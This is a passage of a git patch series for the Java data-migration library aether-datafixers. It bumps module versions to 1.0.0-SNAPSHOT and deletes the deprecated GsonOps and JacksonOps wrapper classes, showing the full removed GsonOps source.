From 10fb6d1018b1a0c7e0fafee1a2ab8c7386e5a5df Mon Sep 17 00:00:00 2001
From: Erik
Date: Sun, 18 Jan 2026 12:34:47 +0100
Subject: [PATCH 01/39] Bump version to `1.0.0-SNAPSHOT` across all modules.
---
aether-datafixers-api/pom.xml | 2 +-
aether-datafixers-bom/pom.xml | 2 +-
aether-datafixers-cli/pom.xml | 2 +-
aether-datafixers-codec/pom.xml | 2 +-
aether-datafixers-core/pom.xml | 2 +-
aether-datafixers-examples/pom.xml | 2 +-
aether-datafixers-functional-tests/pom.xml | 23 +------------------
aether-datafixers-schema-tools/pom.xml | 2 +-
aether-datafixers-spring-boot-starter/pom.xml | 2 +-
aether-datafixers-testkit/pom.xml | 2 +-
pom.xml | 2 +-
11 files changed, 11 insertions(+), 32 deletions(-)
diff --git a/aether-datafixers-api/pom.xml b/aether-datafixers-api/pom.xml
index 1322745..eb56948 100644
--- a/aether-datafixers-api/pom.xml
+++ b/aether-datafixers-api/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-api</artifactId>
diff --git a/aether-datafixers-bom/pom.xml b/aether-datafixers-bom/pom.xml
index e736522..e8627a7 100644
--- a/aether-datafixers-bom/pom.xml
+++ b/aether-datafixers-bom/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-bom</artifactId>
diff --git a/aether-datafixers-cli/pom.xml b/aether-datafixers-cli/pom.xml
index 2b8a30e..21b802b 100644
--- a/aether-datafixers-cli/pom.xml
+++ b/aether-datafixers-cli/pom.xml
@@ -7,7 +7,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-cli</artifactId>
diff --git a/aether-datafixers-codec/pom.xml b/aether-datafixers-codec/pom.xml
index 5d48923..f0b96d8 100644
--- a/aether-datafixers-codec/pom.xml
+++ b/aether-datafixers-codec/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-codec</artifactId>
diff --git a/aether-datafixers-core/pom.xml b/aether-datafixers-core/pom.xml
index e01a286..76d216d 100644
--- a/aether-datafixers-core/pom.xml
+++ b/aether-datafixers-core/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-core</artifactId>
diff --git a/aether-datafixers-examples/pom.xml b/aether-datafixers-examples/pom.xml
index aaf7610..1844744 100644
--- a/aether-datafixers-examples/pom.xml
+++ b/aether-datafixers-examples/pom.xml
@@ -7,7 +7,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-examples</artifactId>
diff --git a/aether-datafixers-functional-tests/pom.xml b/aether-datafixers-functional-tests/pom.xml
index 9c0208c..7547f3b 100644
--- a/aether-datafixers-functional-tests/pom.xml
+++ b/aether-datafixers-functional-tests/pom.xml
@@ -1,25 +1,4 @@
-
@@ -28,7 +7,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-functional-tests</artifactId>
diff --git a/aether-datafixers-schema-tools/pom.xml b/aether-datafixers-schema-tools/pom.xml
index bab6ea2..ce4fc1e 100644
--- a/aether-datafixers-schema-tools/pom.xml
+++ b/aether-datafixers-schema-tools/pom.xml
@@ -7,7 +7,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-schema-tools</artifactId>
diff --git a/aether-datafixers-spring-boot-starter/pom.xml b/aether-datafixers-spring-boot-starter/pom.xml
index 4443770..15657e2 100644
--- a/aether-datafixers-spring-boot-starter/pom.xml
+++ b/aether-datafixers-spring-boot-starter/pom.xml
@@ -7,7 +7,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-spring-boot-starter</artifactId>
diff --git a/aether-datafixers-testkit/pom.xml b/aether-datafixers-testkit/pom.xml
index 98f4b67..08c93df 100644
--- a/aether-datafixers-testkit/pom.xml
+++ b/aether-datafixers-testkit/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>de.splatgames.aether.datafixers</groupId>
         <artifactId>aether-datafixers</artifactId>
-        <version>0.5.0</version>
+        <version>1.0.0-SNAPSHOT</version>
     </parent>
 
     <artifactId>aether-datafixers-testkit</artifactId>
diff --git a/pom.xml b/pom.xml
index 254ac21..ed31b8e 100644
--- a/pom.xml
+++ b/pom.xml
@@ -6,7 +6,7 @@
     <groupId>de.splatgames.aether.datafixers</groupId>
     <artifactId>aether-datafixers</artifactId>
-    <version>0.5.0</version>
+    <version>1.0.0-SNAPSHOT</version>
     <packaging>pom</packaging>
     <modules>
         <module>aether-datafixers-api</module>
From aba886d7568f7e6f8e46f6f3fc669f79a3db8c5a Mon Sep 17 00:00:00 2001
From: Erik
Date: Sun, 18 Jan 2026 12:45:53 +0100
Subject: [PATCH 02/39] Remove deprecated `GsonOps` and `JacksonOps` classes.
---
.../aether/datafixers/codec/gson/GsonOps.java | 737 -----------------
.../datafixers/codec/gson/package-info.java | 110 ---
.../datafixers/codec/jackson/JacksonOps.java | 767 ------------------
.../codec/jackson/package-info.java | 135 ---
.../aether/datafixers/testkit/TestData.java | 15 -
5 files changed, 1764 deletions(-)
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java
deleted file mode 100644
index 55df6ee..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java
+++ /dev/null
@@ -1,737 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-package de.splatgames.aether.datafixers.codec.gson;
-
-import com.google.common.base.Preconditions;
-import com.google.gson.JsonArray;
-import com.google.gson.JsonElement;
-import com.google.gson.JsonNull;
-import com.google.gson.JsonObject;
-import com.google.gson.JsonPrimitive;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
-import de.splatgames.aether.datafixers.api.result.DataResult;
-import de.splatgames.aether.datafixers.api.util.Pair;
-import org.jetbrains.annotations.NotNull;
-import org.jspecify.annotations.Nullable;
-
-import java.util.stream.Stream;
-
-/**
- * Backwards-compatibility wrapper for {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}.
- *
- *
This class provides API compatibility for code written against the pre-0.4.0 package structure.
- * It delegates all operations to the new {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * implementation in the reorganized package hierarchy.
This class is scheduled for removal in version 1.0.0. All functionality remains
- * fully operational until removal, but users should migrate to the new package structure
- * at their earliest convenience.
- *
- *
Delegation Pattern
- *
This wrapper implements the delegation pattern, forwarding all method calls to the
- * underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance.
- * This ensures identical behavior between the deprecated and new implementations.
- *
- *
Thread Safety
- *
This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared
- * across multiple threads, as the underlying implementation is also thread-safe.
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
- * @see DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * from the {@code codec.json.gson} package instead. This class will be removed
- * in version 1.0.0 as part of the package reorganization.
- */
-@Deprecated(forRemoval = true, since = "0.4.0")
-public class GsonOps implements DynamicOps<JsonElement> {
-
- /**
- * The singleton instance of the deprecated {@code GsonOps} wrapper.
- *
- *
This instance wraps {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE}
- * and provides full backwards compatibility. It is thread-safe and can be shared across
- * the entire application.
- *
- * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public static final GsonOps INSTANCE = new GsonOps(de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE);
-
- /**
- * The underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance
- * to which all operations are delegated.
- *
- *
This field holds the actual implementation that performs all DynamicOps operations.
- * The wrapper simply forwards all method calls to this instance, ensuring behavioral
- * equivalence between the deprecated and new implementations.
- */
- private final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps;
-
- /**
- * Creates a new deprecated {@code GsonOps} wrapper delegating to the specified base implementation.
- *
- *
This constructor allows wrapping any {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * instance, though typically the singleton {@link #INSTANCE} should be used instead.
- *
- *
Usage
- *
{@code
- * // Typically use the singleton instead
- * GsonOps ops = GsonOps.INSTANCE;
- *
- * // Or wrap a custom instance if needed
- * GsonOps customOps = new GsonOps(
- * de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE
- * );
- * }
- *
- * @param baseOps the base {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * instance to delegate all operations to; must not be {@code null}
- * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} directly instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- private GsonOps(@NotNull final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps) {
- Preconditions.checkNotNull(baseOps, "baseOps must not be null");
- this.baseOps = baseOps;
- }
-
- // ==================== Empty/Null Values ====================
-
- /**
- * {@inheritDoc}
- *
- *
Returns the canonical empty/null representation for Gson JSON data,
- * which is {@link JsonNull#INSTANCE}. This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#empty()} method.
- *
- * @return {@link JsonNull#INSTANCE} representing the absence of a value
- */
- @NotNull
- @Override
- public JsonElement empty() {
- return this.baseOps.empty();
- }
-
- /**
- * {@inheritDoc}
- *
- *
Returns an empty JSON object ({@code {}}). This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyMap()} method.
Returns an empty JSON array ({@code []}). This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyList()} method.
Checks whether the given JSON element is a map/object structure.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isMap(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonObject}, {@code false} otherwise
- */
- @Override
- public boolean isMap(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isMap(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a list/array structure.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isList(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonArray}, {@code false} otherwise
- */
- @Override
- public boolean isList(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isList(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a string primitive.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isString(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonPrimitive} containing a string,
- * {@code false} otherwise
- */
- @Override
- public boolean isString(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a numeric primitive.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isNumber(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonPrimitive} containing a number,
- * {@code false} otherwise
- */
- @Override
- public boolean isNumber(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isNumber(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a boolean primitive.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isBoolean(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonPrimitive} containing a boolean,
- * {@code false} otherwise
- */
- @Override
- public boolean isBoolean(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isBoolean(value);
- }
-
- // ==================== Primitive Creation ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON string primitive from the given string value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createString(String)} method.
- *
- * @param value the string value to wrap; must not be {@code null}
- * @return a new {@link JsonPrimitive} containing the string
- */
- @NotNull
- @Override
- public JsonElement createString(@NotNull final String value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given integer value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createInt(int)} method.
- *
- * @param value the integer value to wrap
- * @return a new {@link JsonPrimitive} containing the integer
- */
- @NotNull
- @Override
- public JsonElement createInt(final int value) {
- return this.baseOps.createInt(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given long value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createLong(long)} method.
- *
- * @param value the long value to wrap
- * @return a new {@link JsonPrimitive} containing the long
- */
- @NotNull
- @Override
- public JsonElement createLong(final long value) {
- return this.baseOps.createLong(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given float value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createFloat(float)} method.
- *
- * @param value the float value to wrap
- * @return a new {@link JsonPrimitive} containing the float
- */
- @NotNull
- @Override
- public JsonElement createFloat(final float value) {
- return this.baseOps.createFloat(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given double value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createDouble(double)} method.
- *
- * @param value the double value to wrap
- * @return a new {@link JsonPrimitive} containing the double
- */
- @NotNull
- @Override
- public JsonElement createDouble(final double value) {
- return this.baseOps.createDouble(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given byte value.
- * Since JSON has no distinct byte type, the value is stored as a number.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createByte(byte)} method.
- *
- * @param value the byte value to wrap
- * @return a new {@link JsonPrimitive} containing the byte as a number
- */
- @NotNull
- @Override
- public JsonElement createByte(final byte value) {
- return this.baseOps.createByte(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given short value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createShort(short)} method.
- *
- * @param value the short value to wrap
- * @return a new {@link JsonPrimitive} containing the short
- */
- @NotNull
- @Override
- public JsonElement createShort(final short value) {
- return this.baseOps.createShort(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON boolean primitive from the given boolean value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createBoolean(boolean)} method.
- *
- * @param value the boolean value to wrap
- * @return a new {@link JsonPrimitive} containing the boolean
- */
- @NotNull
- @Override
- public JsonElement createBoolean(final boolean value) {
- return this.baseOps.createBoolean(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given {@link Number} value.
- * The specific numeric type is preserved in the underlying JSON representation.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createNumeric(Number)} method.
- *
- * @param value the number value to wrap; must not be {@code null}
- * @return a new {@link JsonPrimitive} containing the number
- */
- @NotNull
- @Override
- public JsonElement createNumeric(@NotNull final Number value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createNumeric(value);
- }
-
- // ==================== Primitive Reading ====================
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the string value from a JSON element. The element must be a
- * {@link JsonPrimitive} containing a string value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getStringValue(JsonElement)} method.
- *
- * @param input the JSON element to extract the string from; must not be {@code null}
- * @return a {@link DataResult} containing the string value on success,
- * or an error if the element is not a string primitive
- */
- @NotNull
- @Override
- public DataResult<String> getStringValue(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getStringValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the numeric value from a JSON element. The element must be a
- * {@link JsonPrimitive} containing a numeric value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getNumberValue(JsonElement)} method.
- *
- * @param input the JSON element to extract the number from; must not be {@code null}
- * @return a {@link DataResult} containing the {@link Number} value on success,
- * or an error if the element is not a numeric primitive
- */
- @NotNull
- @Override
- public DataResult<Number> getNumberValue(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getNumberValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the boolean value from a JSON element. The element must be a
- * {@link JsonPrimitive} containing a boolean value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getBooleanValue(JsonElement)} method.
- *
- * @param input the JSON element to extract the boolean from; must not be {@code null}
- * @return a {@link DataResult} containing the boolean value on success,
- * or an error if the element is not a boolean primitive
- */
- @NotNull
- @Override
- public DataResult<Boolean> getBooleanValue(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getBooleanValue(input);
- }
-
- // ==================== List Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON array from a stream of JSON elements.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createList(Stream)} method.
- *
- * @param values the stream of JSON elements to include in the array; must not be {@code null}
- * @return a new {@link JsonArray} containing all elements from the stream
- */
- @NotNull
- @Override
- public JsonElement createList(@NotNull final Stream<JsonElement> values) {
- Preconditions.checkNotNull(values, "values must not be null");
- return this.baseOps.createList(values);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the elements of a JSON array as a stream. The input must be a
- * {@link JsonArray}.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getList(JsonElement)} method.
- *
- * @param input the JSON element to extract list elements from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of the array elements on success,
- * or an error if the input is not a JSON array
- */
- @NotNull
- @Override
- public DataResult<Stream<JsonElement>> getList(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getList(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON array by appending a value to an existing array.
- * The original array is not modified; a deep copy is created.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToList(JsonElement, JsonElement)} method.
- *
- * @param list the existing JSON array to append to; must not be {@code null}
- * @param value the JSON element to append; must not be {@code null}
- * @return a {@link DataResult} containing the new array with the appended value on success,
- * or an error if the list is not a JSON array
- */
- @NotNull
- @Override
- public DataResult<JsonElement> mergeToList(@NotNull final JsonElement list, @NotNull final JsonElement value) {
- Preconditions.checkNotNull(list, "list must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToList(list, value);
- }
-
- // ==================== Map Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Retrieves the value associated with a key from a JSON object.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#get(JsonElement, String)} method.
- *
- * @param value the JSON object to retrieve from; must not be {@code null}
- * @param key the key to look up; must not be {@code null}
- * @return the JSON element associated with the key, or {@code null} if not present
- * or if the input is not a JSON object
- */
- @Override
- public @Nullable JsonElement get(@NotNull final JsonElement value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.get(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field set to the specified value.
- * If the input is a JSON object, a deep copy is created with the field updated.
- * If the input is not a JSON object, a new object is created containing only the specified field.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#set(JsonElement, String, JsonElement)} method.
- *
- * @param value the JSON element to modify; must not be {@code null}
- * @param key the key for the field to set; must not be {@code null}
- * @param newValue the value to associate with the key; must not be {@code null}
- * @return a new {@link JsonObject} with the field set to the specified value
- */
- @NotNull
- @Override
- public JsonElement set(@NotNull final JsonElement value, @NotNull final String key, @NotNull final JsonElement newValue) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- Preconditions.checkNotNull(newValue, "newValue must not be null");
- return this.baseOps.set(value, key, newValue);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field removed.
- * A deep copy of the input object is created without the specified field.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#remove(JsonElement, String)} method.
- *
- * @param value the JSON object to modify; must not be {@code null}
- * @param key the key of the field to remove; must not be {@code null}
- * @return a new {@link JsonObject} without the specified field
- */
- @NotNull
- @Override
- public JsonElement remove(@NotNull final JsonElement value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.remove(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether a JSON object contains a field with the specified key.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#has(JsonElement, String)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @param key the key to look for; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonObject} and contains the specified key,
- * {@code false} otherwise
- */
- @Override
- public boolean has(@NotNull final JsonElement value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.has(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON object from a stream of key-value pairs.
- * Keys must be JSON string primitives; non-string keys are skipped.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createMap(Stream)} method.
- *
- * @param entries the stream of key-value pairs; must not be {@code null}
- * @return a new {@link JsonObject} containing all valid entries from the stream
- */
- @NotNull
- @Override
- public JsonElement createMap(@NotNull final Stream<Pair<JsonElement, JsonElement>> entries) {
- Preconditions.checkNotNull(entries, "entries must not be null");
- return this.baseOps.createMap(entries);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the entries of a JSON object as a stream of key-value pairs.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getMapEntries(JsonElement)} method.
- *
- * @param input the JSON element to extract entries from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of key-value pairs on success,
- * or an error if the input is not a JSON object
- */
- @NotNull
- @Override
- public DataResult<Stream<Pair<JsonElement, JsonElement>>> getMapEntries(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getMapEntries(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by adding a key-value pair to an existing map.
- * A deep copy of the input map is created with the new entry added.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement, JsonElement)} method.
- *
- * @param map the existing JSON object; must not be {@code null}
- * @param key the key for the new entry (must be a JSON string); must not be {@code null}
- * @param value the value for the new entry; must not be {@code null}
- * @return a {@link DataResult} containing the new object with the added entry on success,
- * or an error if the map is not a JSON object or the key is not a string
- */
- @NotNull
- @Override
- public DataResult<JsonElement> mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement key, @NotNull final JsonElement value) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToMap(map, key, value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by merging two maps together.
- * A deep copy of the first map is created, and all entries from the second map are added.
- * Entries in the second map override entries with the same key in the first map.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement)} method.
- *
- * @param map the base JSON object; must not be {@code null}
- * @param other the JSON object to merge from; must not be {@code null}
- * @return a {@link DataResult} containing the merged object on success,
- * or an error if either argument is not a JSON object
- */
- @NotNull
- @Override
- public DataResult<JsonElement> mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement other) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(other, "other must not be null");
- return this.baseOps.mergeToMap(map, other);
- }
-
- // ==================== Conversion ====================
-
- /**
- * {@inheritDoc}
- *
- *
Converts data from another {@link DynamicOps} format to Gson's {@link JsonElement}.
- * Recursively converts primitives, lists, and maps to their Gson equivalents.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#convertTo(DynamicOps, Object)} method.
- *
- * @param <U> the type parameter of the target format
- * @param ops the target {@link DynamicOps} implementation; must not be {@code null}
- * @param input the data to convert in the source format; must not be {@code null}
- * @return the converted data as a Gson {@link JsonElement}
- */
- @NotNull
- @Override
- public <U> JsonElement convertTo(@NotNull final DynamicOps<U> ops, @NotNull final U input) {
- Preconditions.checkNotNull(ops, "ops must not be null");
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.convertTo(ops, input);
- }
-
- /**
- * Returns a string representation of this deprecated wrapper.
- *
- *
The returned string clearly indicates that this is a deprecated wrapper
- * class and suggests using the new implementation instead.
- *
- * @return a descriptive string indicating deprecated status and the recommended alternative
- */
- @Override
- public String toString() {
- return "GsonOps (deprecated, use de.splatgames.aether.datafixers.codec.json.gson.GsonOps)";
- }
-}
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java
deleted file mode 100644
index c937d27..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java
+++ /dev/null
@@ -1,110 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
